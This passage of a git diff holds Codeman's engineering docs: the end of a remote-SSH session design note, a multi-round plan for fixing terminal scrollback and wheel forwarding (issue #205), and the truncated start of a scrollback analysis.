- **owned (default)** → `buildRemoteLaunchCommand` (the COD-104 path above).
|
||||
|
||||
### Detach-not-kill
|
||||
|
||||
`TmuxManager.killSession()` has an **early return for non-owned remote sessions**:
|
||||
it tears down **only the LOCAL pane** holding the ssh client (`tmux -L codeman
|
||||
kill-session` on *this* host's socket). Killing the local ssh sends SIGHUP to the
|
||||
remote `tmux attach`, which **detaches** — the durable remote session survives.
|
||||
The early return is a structural guarantee that **no code path can ever issue a
|
||||
remote `kill-session` for a session we don't own** — the only `kill-session` run is
|
||||
on the local socket, which never reaches the remote socket.
|
||||
|
||||
## API
|
||||
|
||||
Routes are registered in `src/web/routes/case-routes.ts`:
|
||||
|
||||
| Method | Path | Purpose |
|
||||
|--------|------|---------|
|
||||
| `GET` | `/api/remote-hosts` | List saved hosts |
|
||||
| `POST` | `/api/remote-hosts` | Create a host |
|
||||
| `PUT` | `/api/remote-hosts/:id` | Update a host |
|
||||
| `DELETE` | `/api/remote-hosts/:id` | Delete a host |
|
||||
| `GET` | `/api/remote-hosts/:hostId/sessions` | Discover `codeman-*` sessions on the host (COD-105; `listRemoteCodemanSessions`, never errors) |
|
||||
| `POST` | `/api/cases/remote-link` | Link a case to a remote host (creates the `RemoteCase`) |
|
||||
|
||||
Attaching to a discovered session is a **session-create** path, not a host route:
|
||||
`POST /api/sessions` accepts `attachRemoteSession: { hostId, remoteSessionName }`
|
||||
(schema in `schemas.ts`; `remoteSessionName` must match `^codeman-[a-zA-Z0-9._-]+$`),
|
||||
which `session-routes.ts` turns into a non-owned (`owned: false`) session.
|
||||
|
||||
Frontend touchpoints: the remote-host management UI is in `session-ui.js` /
|
||||
`panels-ui.js`; a remote session is created by picking a remote host/case in the
|
||||
session-create flow, or via the per-host **"Discover existing sessions"** button →
|
||||
**Attach** action (creates an `owned: false` session).
|
||||
|
||||
## Security notes
|
||||
|
||||
- **`identityFile` is a path only — never key bytes.** Codeman stores the path and
|
||||
passes it to `ssh -i`; the key never enters Codeman's state or the wire.
|
||||
- The injection surface is the SSH option fields. The single-source
|
||||
`buildSshConnectionArgs` + `shellescape` discipline (COD-107) is the control —
|
||||
audit any new code path that constructs an ssh command to route through it
|
||||
rather than concatenating options inline.
|
||||
- `BatchMode=yes` means **no interactive password/passphrase prompts** — remote
|
||||
hosts must be reachable with key-based or agent auth (or an unencrypted key the
|
||||
agent has loaded). A host needing a passphrase will fail the probe with an ssh
|
||||
diagnostic rather than hang.
|
||||
|
||||
## Related
|
||||
|
||||
- `CLAUDE.md` → Architecture → **Remote** row, and the **Remote sessions (SSH)**
|
||||
Key Pattern.
|
||||
- `docs/security-architecture.md` — overall network/auth model.
|
||||
- COD-104 (tmux prereq + durable launch), COD-105 (discover + attach, detach-not-kill ownership), COD-107 (shell-safe connection args).
|
||||
|
Before Width: | Height: | Size: 894 KiB |
|
Before Width: | Height: | Size: 576 KiB |
|
After Width: | Height: | Size: 661 KiB |
|
After Width: | Height: | Size: 452 KiB |
|
Before Width: | Height: | Size: 99 KiB |
@@ -0,0 +1,301 @@
|
||||
# Scrollback fix plan (issue #205)
|
||||
|
||||
Status: IMPLEMENTED on `fix/scrollback-shell-alt-screen` (2026-08-07), with one deliberate
|
||||
divergence from the recommendation below. Kept for the diagnosis record; the measured evidence
|
||||
behind it is `docs/scrollback-issues-analysis.md`, and the mechanisms as shipped are documented
|
||||
in `docs/architecture-invariants.md` (§ Full-scrollback replay, § Terminal scrollback: strip
|
||||
flavors and wheel/touch forwarding).
|
||||
|
||||
What shipped vs. what this doc proposed:
|
||||
|
||||
- **Bug A (deltaMode)**: implemented as specified (`_wheelScrollLines()` normalizes
|
||||
line/page/pixel units, Shift-axis trap kept).
|
||||
- **Bug B (shell scrollback)**: implemented via the NARROW alt-screen strip for tmux-backed
|
||||
shell/opencode/antigravity plus the scroll-to-top `full=1` re-pull, NOT the recommended
|
||||
approach (a) `tmux mouse on`. The measurements in the analysis doc showed the alt buffer
|
||||
comes from tmux's own client-side `smcup` at attach (tmux never forwards a pane program's
|
||||
alt-screen toggles), so stripping that one sequence fixes both symptoms with no selection
|
||||
tradeoff, keeps vim/less/htop untouched, and the re-pull also covers the repaint-burst
|
||||
history loss that `mouse on` would not have addressed.
|
||||
- **Invariant change**: the "viewport-at-bottom gate stays" invariant below was deliberately
|
||||
DROPPED for forwarding modes: a repaint-mode CLI keeps no real terminal scrollback, so the
|
||||
gate pinned users to a buffer of stale frames whenever the viewport parked off-bottom.
|
||||
Forwarding now snaps to bottom first; Shift+wheel and the opt-out setting keep local
|
||||
scrollback reachable. Touch forwards through the same gate (the mobile half of the fix).
|
||||
- **Finding 5 (remote probe)**: implemented (`probeRemoteCliVersion` over ssh, deferred at
|
||||
session start, same login-shell wrapper as the launch).
|
||||
|
||||
## RETEST FAILED (2026-08-07, after v1.12.0 shipped) — analysis round 2
|
||||
|
||||
mtiller retested on 1.12.0 and reports it is NOT fixed (issue #205 comment, 2026-08-07 12:12 UTC;
|
||||
issue reopened same day with clarifying questions: mouse vs trackpad, Shift+scroll behavior,
|
||||
Claude vs shell session on the phone, and an iOS full-tab-kill to rule out stale JS). Two
|
||||
failure signatures, now analyzed against the SHIPPED 1.12.0 code (not the pre-fix code):
|
||||
|
||||
1. **iPhone Safari (Claude session assumed)**: touch scrollback goes back only a limited
|
||||
amount and sometimes REPEATS blocks of text; unreliable.
|
||||
2. **Firefox on macOS (mouse)**: wheel does NOTHING at all, while Fn+Up (= PageUp) pages back
|
||||
through INTACT text.
|
||||
|
||||
### Ruled out by code reading
|
||||
|
||||
- deltaMode mishandling: `_wheelScrollLinesFloat` normalizes line/page/pixel units correctly;
|
||||
a Firefox line-mode notch yields ±3 lines. Not the bug.
|
||||
- Ephemeral transport: `_sendInputEphemeral` (app.js) has a POST fallback when WS is down.
|
||||
- Service worker: sw.js is network-first with cache fallback; it serves stale JS only when the
|
||||
fetch FAILS (flaky mobile connection can do this — relevant to "unreliable" on the phone,
|
||||
and the fixed `CACHE_NAME = 'codeman-v1'` never invalidates that offline copy).
|
||||
|
||||
### The load-bearing observation: PageUp works, the wheel does not
|
||||
|
||||
Fn+Up is a KEYBOARD event: xterm encodes PageUp and Claude pages its own transcript (intact
|
||||
text proves Claude-side history is fine and the PTY input path is fine). The wheel path is the
|
||||
capture-phase handler, and for a Claude session it has exactly two branches:
|
||||
|
||||
- **Forwarding branch** (`_shouldForwardWheelToApp` true): snap-to-bottom + SGR reports. If
|
||||
this branch ran, the user would see the same paging motion Fn+Up produces. They see nothing.
|
||||
- **Local branch** (gate false): `_smoothScrollBy` over xterm's local buffer. For a Claude
|
||||
pane in repaint mode, tmux keeps `history_size≈0`, so `?full=1` returns roughly one frame:
|
||||
the local buffer is structurally HOLLOW, the top-of-buffer re-pull recovers nothing, and the
|
||||
wheel looks completely dead. **This matches every observed detail on Firefox.**
|
||||
|
||||
So the working hypothesis is that mtiller's sessions evaluate the gate FALSE. The gate
|
||||
(`_shouldForwardWheelToApp`) has exactly four false-paths worth checking, in likelihood order:
|
||||
|
||||
1. **`terminalWheelLocalScrollback` opt-out is ON.** Plausible: a user whose scrolling was
|
||||
broken on 1.11.x may well have toggled "Wheel scrolls local history" while trying to fix
|
||||
it. On 1.12.0 that setting now routes the wheel to a hollow local buffer = dead wheel on
|
||||
desktop AND the stale-repaint-frames experience on the phone (see below). Ask, or check
|
||||
what the setting does on their export.
|
||||
2. **`cliVersion` missing — CONFIRMED BUG, independent of whether it is mtiller's**:
|
||||
`getClaudeCliVersion()` (utils/claude-cli-resolver.ts:124-148) caches its result
|
||||
process-wide including FAILURE: on any exception it sets `_claudeVersion = null`, and the
|
||||
guard is `!== undefined`, so a single failed/timed-out probe (5s `EXEC_TIMEOUT_MS`; PATH
|
||||
under systemd/launchd; transient fs hiccup) at the FIRST Claude session start disables
|
||||
wheel forwarding for every Claude session until the server restarts. Fix: cache success
|
||||
permanently, but let failure retry (retry on next call, or a short negative-cache TTL).
|
||||
Note that mtiller sees identical breakage on phone + iPad + laptop, which points at a
|
||||
SERVER-side/session-side cause exactly like this (cliVersion is shared by all devices)
|
||||
rather than anything browser-specific.
|
||||
3. **Claude Code genuinely < 2.1.187** on their machine: gate false BY DESIGN, but the
|
||||
resulting UX is a dead-end (no local history to fall back on).
|
||||
4. mouseTrackingMode non-none (a DECSET leaked past the strip, e.g. emitted before attach or
|
||||
split across chunks in a way the carry missed): would also kill the container handler via
|
||||
the early return. Least likely, checkable via `terminal.modes.mouseTrackingMode` in console.
|
||||
|
||||
### The iPhone symptoms fit the same gate-false story
|
||||
|
||||
Touch with gate false = local `scrollLines()` over whatever repaint frames accumulated:
|
||||
"repeats blocks of text" is literally what a buffer of successive overlapping repaint frames
|
||||
looks like; "limited amount" is its thinness; "unreliable" is burst-dependence (finding 2)
|
||||
PLUS the new re-pull being actively DESTRUCTIVE for repaint panes: `_maybeRefetchFullHistory`
|
||||
does `_resetTerminalForReplay()` then writes the fetched capture, and when that capture is
|
||||
one frame (Claude pane, `history_size≈0`) it REPLACES a multi-frame buffer with less than the
|
||||
user had, mid-scroll. Stale pre-1.12 JS on the phone (suspended Safari tab) remains possible
|
||||
until they confirm the tab kill.
|
||||
|
||||
### Fix directions, ranked
|
||||
|
||||
1. **Make the re-pull refuse downgrades** (`_maybeRefetchFullHistory`, app.js): if the fetched
|
||||
capture would yield FEWER buffer rows than currently present, skip the reset+rewrite and
|
||||
keep the richer buffer (optionally cache-mark the session "re-pull useless"). Small, safe,
|
||||
kills the "got worse after scrolling to top" class. Consider skipping the re-pull entirely
|
||||
for forwarding-capable modes where tmux keeps no history.
|
||||
2. **Rescue the gate-false Claude dead-end with PageUp forwarding**: when mode is `claude`,
|
||||
the gate is false, AND the local buffer has no scrollback (`baseY === 0`), translate wheel
|
||||
lines into coalesced PageUp/PageDown key sends (mtiller just proved Claude pages correctly
|
||||
on PageUp even on their version). Zero regression risk under that triple guard: sessions
|
||||
with real local history keep local scrolling; only the currently-dead path changes.
|
||||
Caveat: older Claude menus may react to PageUp; acceptable against "completely dead".
|
||||
3. **Audit `getClaudeCliVersion()` failure caching** (utils/claude-cli-resolver.ts): a cached
|
||||
empty probe must retry (with backoff), not poison the process.
|
||||
4. **Guard the opt-out setting's footgun**: if `terminalWheelLocalScrollback` is ON for a
|
||||
repaint-mode CLI session, local history is hollow; either scope the setting's effect to
|
||||
modes with real local scrollback, or pair it with fix 2's PageUp fallback so it still
|
||||
scrolls SOMETHING.
|
||||
5. **Add a one-line gate diagnostic**: log (once per session, console) WHY the wheel chose
|
||||
local vs forward: `{mode, cliVersion, optOut, trackingMode}`. The #205 thread is now two
|
||||
rounds deep on guesswork a single console line would have answered.
|
||||
|
||||
### What shipped for round 2 (branch `fix/scrollback-205-round2`)
|
||||
|
||||
All five directions above, implemented as ranked:
|
||||
|
||||
1. **Downgrade guard** — `_replayWouldShrinkBuffer()` (terminal-ui.js) estimates the rows a
|
||||
capture will occupy (ANSI stripped, `capture-pane -J` re-wrapping accounted for) and
|
||||
`_maybeRefetchFullHistory` (app.js) skips the reset+rewrite when that is more than one
|
||||
screen short of what xterm already holds. A refused session goes on
|
||||
`_fullHistoryRepullUseless`, which raises its re-pull cooldown from 4s to 60s so a hollow
|
||||
pane stops re-fetching. Measured A/B on a live Claude pane, same gesture, same buffer:
|
||||
guard off → 341 rows collapse to 42 and every seeded row is gone; guard on → 341 rows
|
||||
preserved. The tab-switch recovery it must not break still runs (shell buffer 401 → 44 on
|
||||
a tab switch → 401 again after scrolling to the top).
|
||||
2. **PageUp/PageDown fallback** — `_maybePageCliTranscript()` translates wheel/touch travel
|
||||
into coalesced `\x1b[5~` / `\x1b[6~` under the triple guard (claude mode, forwarding gate
|
||||
false, `baseY === 0`), through the same 40ms queue as the SGR reports. Half a screen of
|
||||
travel per page: the page key always jumps a whole screen, and a 1:1 mapping was
|
||||
unusably slow with a discrete wheel. Shift is excluded — it keeps meaning "local
|
||||
scrollback". Verified live: opt-out ON on a Claude session sends real PageUp/PageDown to
|
||||
the PTY where the wheel previously did nothing.
|
||||
3. **Probe caching** — `getClaudeCliVersion()` no longer caches failure. Success is kept for
|
||||
the process lifetime; a failed probe retries with a 1/2/4…15min backoff. The cache policy
|
||||
is a pure function (`resolveClaudeCliVersion`) so the retry semantics are unit-testable
|
||||
without spawning `claude`. The VITEST short-circuit now records nothing, where before it
|
||||
wrote a permanent null.
|
||||
4. **Opt-out footgun** — handled by pairing rather than by scoping: the setting keeps meaning
|
||||
exactly what it says (the wheel goes local), and fix 2 catches the case where "local" is
|
||||
empty. Scoping the setting away from repaint-mode CLIs would have silently overridden an
|
||||
explicit user choice. The App Settings tooltip now says to leave it off for Claude/Codex.
|
||||
5. **Diagnostic** — `_logScrollRouting()` prints one line per session per distinct decision:
|
||||
`[scroll] <id> → forward-sgr|page-keys|local-scrollback|repull-refused-downgrade (mode=…,
|
||||
cliVersion=…, localScrollbackOptOut=…, mouseTracking=…, localScrollbackRows=…)`. That
|
||||
single line answers every open question in the list below.
|
||||
|
||||
Still unanswered by code alone: whether mtiller's Claude Code is genuinely older than
|
||||
2.1.187 (false-path 3), and whether the iPhone was running stale JS. The diagnostic makes
|
||||
both self-reporting, so the retest ask is now "open the console and paste the `[scroll]` line".
|
||||
|
||||
### What to get from mtiller (some already asked)
|
||||
|
||||
- Shift+scroll behavior on Firefox (distinguishes hollow-local from handler-not-firing).
|
||||
- `claude --version` on the Mac (decides false-paths 2 vs 3).
|
||||
- App Settings → Input → "Wheel scrolls local history" state (false-path 1).
|
||||
- iPhone: Claude or shell session, and whether a full tab kill changes anything.
|
||||
- Browser console: `app.terminalUi?.terminal?.modes?.mouseTrackingMode` (false-path 4).
|
||||
|
||||
## ROUND 3 (2026-08-09): Codex wheel dead — CONFIRMED AND FIXED
|
||||
|
||||
DodgyBadger (Codex latest, Chrome, Windows 11): mouse wheel does nothing in a CODEX session
|
||||
while working fine in shell and web tabs; DRAGGING THE SCROLLBAR WORKS, so xterm's local
|
||||
buffer demonstrably has content for their codex pane. Analysis against the shipped code:
|
||||
|
||||
- `_shouldForwardWheelToApp` returns true UNCONDITIONALLY for `codex` (no version gate, unlike
|
||||
claude's `>= 2.1.187`), so every plain wheel tick is sent as SGR reports to Codex.
|
||||
- The "verified to scroll its transcript on SGR wheel reports" claim for codex predates
|
||||
current Codex builds; if Codex latest ignores SGR wheel, forwarding eats the gesture while
|
||||
the healthy local scrollback (proven by the working scrollbar) sits unused.
|
||||
- The #227 PageUp fallback cannot rescue this: it is gated to `claude` mode AND `baseY === 0`,
|
||||
and codex here has real local scrollback. The `[scroll]` diagnostic will still say
|
||||
`forward-sgr (mode=codex, ...)`, confirming the branch, worth asking the reporter to paste.
|
||||
|
||||
**CONFIRMED by the reporter's `[scroll]` line (2026-08-09, PR #227 comment)**:
|
||||
`forward-sgr (mode=codex, cliVersion=unknown, localScrollbackOptOut=false, mouseTracking=none,
|
||||
localScrollbackRows=967)`. Forwarding branch active, 967 rows of healthy local scrollback
|
||||
unused, Codex ignoring the SGR reports. Environment: Codex latest, Chrome, Windows 11.
|
||||
|
||||
**Measured against codex-cli 0.147.0** (isolated `tmux -L codexwheel`, fake `CODEX_HOME/auth.json`,
|
||||
history built with 401ing prompts), which settles it without needing a version gate at all:
|
||||
|
||||
| Probe | Result |
|
||||
| ---------------------------------------------- | ----------------------------------------------- |
|
||||
| `#{mouse_any_flag}` once the TUI is up | `0`: codex never enables mouse tracking |
|
||||
| `#{alternate_on}` | `0`: inline viewport, not an alt-screen pager |
|
||||
| `#{history_size}` while prompting | grows 3 → 32: the transcript goes to scrollback |
|
||||
| 6 × `\x1b[<64;10;10M` written to the pane | pane capture byte-identical, nothing happens |
|
||||
| control: literal `zz` | pane changes, so the probe can see changes |
|
||||
| `\x1b[<0;12;5M` + release (the click-tap path) | no change either: taps are no-ops, not garbage |
|
||||
|
||||
Codex has no in-app pager to drive: its history lives in the terminal's own scrollback, which is
|
||||
exactly what forwarding was stealing the gesture from. A version gate would be the wrong fix (and
|
||||
`cliVersion=unknown` means there is no codex probe to gate on anyway).
|
||||
|
||||
**Fix (shipped):** `_shouldForwardWheelToApp` now returns true for `claude >= 2.1.187` and nothing
|
||||
else. Codex falls to the normal local-scrollback path like shell/gemini/opencode, so wheel and touch
|
||||
scroll the same history the scrollbar drag was already scrolling. The claude-only PageUp fallback is
|
||||
untouched: codex never needs it, its local buffer is real. Taps stay hand-encoded for codex
|
||||
(`_sessionUsesServerMouseStrip`), measured harmless, so click-to-position is merely unavailable
|
||||
there rather than damaging. Lesson for the next mode added to the forward list: "it is a strip mode"
|
||||
proves nothing, write a real SGR report into a live pane and diff the capture first.
|
||||
|
||||
Verified end-to-end in Chromium against a live codex session on an isolated instance
|
||||
(`CODEMAN_INSTANCE=codexwheel`, port 5055, `envOverrides.CODEX_HOME` pointing at the fake auth
|
||||
dir): trusted `page.mouse.wheel` up now logs
|
||||
`[scroll] … → local-scrollback (mode=codex, …, localScrollbackRows=43)`, moves the viewport
|
||||
39 → 4 (back to the Codex banner), and sends ZERO bytes to the PTY. Unit coverage:
|
||||
`test/terminal-touch-tap.test.ts` ("only claude forwards — codex and gemini keep the local wheel").
|
||||
|
||||
Original plan follows.
|
||||
|
||||
## Reports
|
||||
|
||||
- **Issue #205** (https://github.com/Ark0N/Codeman/issues/205), OPEN:
|
||||
- **jonocodes** (author, 2026-08-03): SHELL session. Host Mac M4, brew tmux. On Android, touch-scrolling the terminal does nothing. On desktop, the mouse wheel cycles shell command history (acts like Up/Down arrows) instead of scrolling the screen.
|
||||
- **mtiller** (comment, 2026-08-06): "similar issue just with scrolling backward to see agent output. This is with Firefox on MacOS." (Claude session implied.)
|
||||
- **Reddit r/selfhosted** comment `p21x6ts` by mmtiller (= mtiller on GitHub): scrolling broken enough across phone/iPad/laptop that they fall back to Claude's own remote-control feature. Churn-risk user who otherwise loves the product; fixing this has promo value beyond the bug itself.
|
||||
|
||||
## How scrolling works today (read this before touching anything)
|
||||
|
||||
Three independent paths, all in `src/web/public/terminal-ui.js` unless noted:
|
||||
|
||||
1. **Desktop wheel** (container `wheel` listener, ~line 421): ALWAYS `preventDefault()`s, then either
|
||||
- forwards synthetic SGR wheel reports to the app (`_sendSyntheticSgrWheel`, coalesced every 40ms, fire-and-forget) when `_shouldForwardWheelToApp(ev)` (~line 2823) passes: no Shift held, opt-out setting `terminalWheelLocalScrollback` off, xterm `mouseTrackingMode === 'none'`, session mode is `claude` with `cliVersion >= 2.1.187` or `codex`, and viewport is at bottom;
|
||||
- otherwise scrolls xterm's LOCAL scrollback via `terminal.scrollLines(lines)`.
|
||||
- `lines` comes from `_wheelScrollLines(ev)` (~line 2818): `delta / 25`, i.e. it assumes PIXEL deltas.
|
||||
- NOTE: xterm.js's own internal wheel handler sits on an element INSIDE the container, so it runs FIRST (bubble order) and is not suppressed by the container's `preventDefault`.
|
||||
2. **Touch** (touchstart/move/end, ~lines 441-585): converts touch deltas to `terminal.scrollLines()` with momentum. Touch is ALWAYS local-scrollback, never forwarded to the app. Tap-to-position (touchend, ~line 533) is separate and already handles both mouse-tracking-on and server-strip cases.
|
||||
3. **Server-side strip** (`_handleTerminalOutput`, `src/session.ts:1384`): for modes in `isAltScreenStripMode()` (`src/session.ts:179` = `codex | claude | gemini`), strips alt-screen switches (`?47/?1047/?1049`), scrollback erase (`3J`), and mouse-tracking DECSETs (`?1000-?1007` except `?1004` focus) so content stays in xterm's normal buffer with scrollback intact. Includes a chunk-boundary carry so split sequences can't leak. `shell` and `opencode` (and `antigravity`) are deliberately EXCLUDED: arbitrary shell programs (vim/less/htop) legitimately need the alt screen. There is a parity copy of this strip on the replay path (`src/web/routes/session-routes.ts`, ~line 1697) and a frontend parity check `_sessionUsesServerMouseStrip()` (terminal-ui.js ~line 2751). All three must stay in sync.
|
||||
4. Related: full-scrollback replay (`GET .../terminal?full=1` on first buffer load) fills xterm local scrollback; client scrollback is hardcoded 50k (`DEFAULT_SCROLLBACK`, constants.js) vs tmux 100k.
|
||||
|
||||
## Diagnosis
|
||||
|
||||
### Bug A: Firefox wheel deltas (mtiller's desktop case)
|
||||
|
||||
`_wheelScrollLines()` divides by 25 assuming `WheelEvent.deltaY` is pixels (`deltaMode === 0`, Chrome/Safari behavior). Firefox commonly fires `deltaMode === 1` (LINE units, deltaY around 1-3 per notch), so `Math.round(3/25) = 0` and the `|| ±1` fallback yields 1 line per event. With a discrete mouse wheel that is 1 line per notch: scrolling feels dead/broken. This hits BOTH the local-scroll path and the forwarded path, since both use the same function.
|
||||
|
||||
**Fix**: normalize by `ev.deltaMode` in `_wheelScrollLines()`:
|
||||
- `deltaMode 0` (pixels): current behavior, `delta / 25`.
|
||||
- `deltaMode 1` (lines): use the delta directly (round, keep sign fallback).
|
||||
- `deltaMode 2` (pages): `delta * terminal.rows` (or a sane page size).
|
||||
Keep the existing Shift-axis trap intact: on macOS trackpads Shift+two-finger scroll arrives as a HORIZONTAL wheel (deltaX carries the magnitude, deltaY ~0); that's why the function reads deltaX when Shift is held (issue #154). Don't lose it.
|
||||
|
||||
**Verify**: don't trust this diagnosis blindly. First reproduce in real Firefox on macOS and log `deltaMode`/`deltaY` (Firefox trackpad input can arrive as pixels; external mouse as lines). Also confirm the session's `cliVersion` probe succeeded (a failed probe disables forwarding entirely, which would point elsewhere). Unit-test by dispatching synthetic `WheelEvent`s with explicit `deltaMode` values; a Playwright `firefox` project pass is the end-to-end check.
|
||||
|
||||
### Bug B: shell mode has NO working scrollback at all (jonocodes)
|
||||
|
||||
Chain: shell mode is excluded from the alt-screen strip (correctly) → tmux attaches on the alternate screen → xterm's alt buffer has zero scrollback. Consequences:
|
||||
- **Wheel**: xterm's own internal wheel handler runs first and, in the alt buffer, converts wheel ticks into Up/Down arrow keys (alternateScroll behavior). The shell receives arrows → command history cycles. That is jonocodes' exact desktop symptom. The container handler's `scrollLines()` afterwards is a no-op (no scrollback in alt buffer).
|
||||
- **Touch**: the touch handler's `scrollLines()` is equally a no-op → "scrolling does nothing" on Android. Exact symptom two.
|
||||
- The real history exists the whole time in tmux's 100k-line buffer; nothing exposes it.
|
||||
|
||||
**Fix, recommended approach (a): enable tmux `mouse on` for shell sessions.**
|
||||
- Server-side, set `mouse on` scoped to shell sessions' tmux sessions (`tmux set-option -t <session> mouse on` at create + on attach of recovered sessions). Do NOT set it globally on the socket: claude/codex/gemini sessions rely on the DECSET strip and must not change.
|
||||
- What this buys, all natively: tmux enables mouse tracking on the outer terminal → xterm `mouseTrackingMode` goes non-none → the container handler stands down (line ~2830 check) and xterm's own encoder forwards wheel as SGR reports → tmux scrolls its OWN copy-mode history on wheel-up, auto-exits at bottom. The alt-scroll arrow conversion disappears too (tracking mode takes precedence). Desktop is fully fixed with no new endpoints.
|
||||
- **Touch**: still needs one small client change: in the touchmove path, when the active session is `shell` AND `mouseTrackingMode !== 'none'`, convert accumulated lines to `_sendSyntheticSgrWheel(x, y, lines)` instead of `scrollLines()`. The 40ms coalescing already prevents the tmux process storm (each send is a tmux send-keys server-side; unbatched flicks would spawn dozens of processes: this constraint is documented at `_sendSyntheticSgrWheel`, do not bypass it).
|
||||
- **Selection tradeoff to verify**: with tracking on, xterm hands drag events to tmux instead of doing local browser selection. Shift+drag still does local selection (xterm shift-override). Verify this UX on desktop before shipping; if it's unacceptable, fall back to approach (b).
|
||||
- **Also verify**: vim/less/htop inside the shell still behave (they'll now receive real mouse events via tmux, generally an improvement); remote shell sessions run tmux on the REMOTE host (`tmux -L codeman-remote`) and need the same option set there if remote shells are in scope (fine to defer, note it in the changeset if skipped).
|
||||
|
||||
**Fallback approach (b), only if (a)'s selection tradeoff fails testing**: keep mouse off; when a shell session is in the alt buffer, have the client send scroll intents to a small server endpoint that drives `tmux copy-mode -e -t <pane>` + `send-keys -X -N <n> scroll-up/down`. Preserves selection semantics exactly, but needs a new endpoint, server-side batching, AND suppression of xterm's native alt-scroll arrow conversion (capture-phase wheel listener with `stopPropagation`, or `attachCustomWheelEventHandler` if the vendored xterm version has it). More moving parts; (a) should be tried first.
|
||||
|
||||
**Not acceptable**: adding `shell` to `isAltScreenStripMode()`. vim/less/htop need the alt screen; that exclusion is deliberate and documented.
|
||||
|
||||
### Bug C: mtiller's phone/iPad case — UNREPRODUCED, do not guess
|
||||
|
||||
Touch is always-local by design, and Claude sessions keep content in the normal buffer (strip), so touch scrollback "should" work there. Before coding anything: build a repro matrix (iPhone Safari / iPad Safari / Android Chrome × claude / shell) on the current release. Plausible candidates if it does reproduce: auto-scroll-to-bottom fighting user scrolls (`_noteTerminalUserScroll`, ~line 2004), or they were in shell sessions on mobile too (then Bug B covers it). Ask mtiller on #205 for session mode + Codeman version if the matrix comes up clean.
|
||||
|
||||
## Invariants the implementation MUST respect
|
||||
|
||||
- Shift+wheel always scrolls local scrollback; the trackpad Shift-axis handling from #154 stays.
|
||||
- The `terminalWheelLocalScrollback` opt-out setting keeps working (pins plain wheel to local).
|
||||
- The viewport-at-bottom gate stays: once the user scrolled up locally, wheel stays local until they return to bottom.
|
||||
- 40ms SGR coalescing: never send per-event writes to the server.
|
||||
- Strip parity triangle: `session.ts` live strip ↔ `session-routes.ts` replay strip ↔ `_sessionUsesServerMouseStrip()` in the frontend. If you touch mode lists, update all three.
|
||||
- Don't add `opencode`/`antigravity` to any strip/forward list; their TUI wheel behavior is unverified (documented at `_shouldForwardWheelToApp`).
|
||||
- The chunk-boundary sequence carry in `_handleTerminalOutput` must not be weakened.
|
||||
|
||||
## Testing (per repo rules)
|
||||
|
||||
- `npm test -- test/<file>.test.ts` only; never bare `npm test`. New test ports 3150+, never 3000.
|
||||
- Browser-test traps (documented in CLAUDE.md Testing): drive input/scroll through real events (`page.mouse.wheel`, real touch), not app internals; headless Chromium reports `isTouchDevice()` false even with `hasTouch: true`; assert on real state (xterm viewport position, `tmux -L codeman capture-pane`), not HTTP 200.
|
||||
- Shell-mode E2E: create a throwaway shell session, `seq 1 500`, then (1) wheel up on desktop shows earlier lines, not history cycling; (2) touch-scroll on a phone shows earlier lines; (3) `vim` + `less` still enter/leave the alt screen cleanly; (4) Shift+drag still selects text.
|
||||
- Firefox E2E: Playwright `firefox` project, wheel over a Claude session's finished output, assert viewport moved more than 1 line per notch.
|
||||
- End-to-end against the REAL environment before claiming done (standing user rule). w1/w2/w3 tmux sessions are the user's live sessions: never send input to them; create your own throwaway session and DELETE it by exact id when done.
|
||||
|
||||
## Related observation (not a reported bug, worth a look while in there)
|
||||
|
||||
The `claude --version` probe that feeds the forwarding gate runs only for local and docker sessions (`src/session.ts:1490` gates `!this._remote`; docker handled at :1507). Remote Claude sessions therefore never get `cliVersion` and silently keep local-only wheel. Harmless (local scrollback works) but inconsistent; cheap to fix by probing over ssh, or document as intended.
|
||||
|
||||
## Rollout
|
||||
|
||||
1. Bug A (deltaMode) is small and independent: can ship alone as a patch.
|
||||
2. Bug B (shell scrollback) is the headline fix for #205: patch or minor per COM flow.
|
||||
3. After deploy + verification: comment on #205 (what was fixed, what needs their retest), then reply to the Reddit comment `p21x6ts` with the release version. Both reporters gave environment details; address them specifically.
|
||||
@@ -0,0 +1,255 @@
|
||||
# Scrollback issues: analysis and test evidence
|
||||
|
||||
Covers GitHub issue **#205** ("Scrollback in terminal not working", jonocodes, shell mode,
|
||||
Android + macOS desktop) and the follow-up comment on it from **mtiller** (Firefox on macOS,
|
||||
"scrolling backward to see agent output"). Related closed issue: **#154** (fixed in 1.3.3).
|
||||
|
||||
Status: **analysis only, nothing implemented.** Measured against the live 1.11.2 instance on
|
||||
2026-08-06 with throwaway `zz-*` shell sessions (all deleted afterwards; the user's `w*`
|
||||
sessions were never touched).
|
||||
|
||||
---
|
||||
|
||||
## TL;DR
|
||||
|
||||
Five distinct problems, not one. #205 is fully explained by finding 1; findings 2 and 3 are
|
||||
independent and hit **every** mode including Claude, and are the likely substance of the
|
||||
"similar issue" follow-up.
|
||||
|
||||
| # | Problem | Modes affected | Severity | Confirmed |
|
||||
| - | ------- | -------------- | -------- | --------- |
|
||||
| 1 | xterm parked in the **alternate buffer** for the whole session, so there is no scrollback at all and the wheel is translated into Up/Down arrow keys | `shell`, `opencode`, `antigravity` | High | Reproduced end to end |
|
||||
| 2 | **Bursty output silently destroys a screenful** of the browser's scrollback and adds ~1 row | all | High | Measured |
|
||||
| 3 | **Tab switch collapses scrollback** to roughly one screen (`full=1` fires once per page load) | all | Medium | Measured |
|
||||
| 4 | `deltaMode` is never read, so Firefox scrolls ~4x slower per notch | all, Firefox | Low | Static, needs reporter data |
|
||||
| 5 | **Remote SSH Claude cases get no `claude --version` probe**, so wheel forwarding silently stays off (residual #154) | `claude` + remote | Medium | Static |
|
||||
|
||||
---
|
||||
|
||||
## Finding 1: shell / opencode / antigravity are stuck in xterm's alternate buffer
|
||||
|
||||
### Root cause
|
||||
|
||||
The local tmux **client** (the `tmux attach` that node-pty spawns) emits `smcup` as its very
|
||||
first bytes on attach. Captured from a real PTY:
|
||||
|
||||
```
|
||||
b'\x1b[?1049h\x1b[22;0;0t\x1b[?1h\x1b=\x1b[H\x1b[2J\x1b[?12l\x1b[?25h\x1b[?1000l...'
|
||||
^^^^^^^^^^ enter alternate screen ^^^^^ application cursor keys ON
|
||||
```
|
||||
|
||||
`Session._handleTerminalOutput()` strips `\x1b[?1049h` from the live stream, but only when
|
||||
`isAltScreenStripMode(mode)` is true, and that is `claude | codex | gemini` only
|
||||
(`src/session.ts:179`). For `shell`, `opencode` and `antigravity` the sequence reaches the
|
||||
browser verbatim and xterm switches to the alternate buffer, where:
|
||||
|
||||
1. `buffer.active.type === 'alternate'` and `baseY` is pinned at 0, so there is **no
|
||||
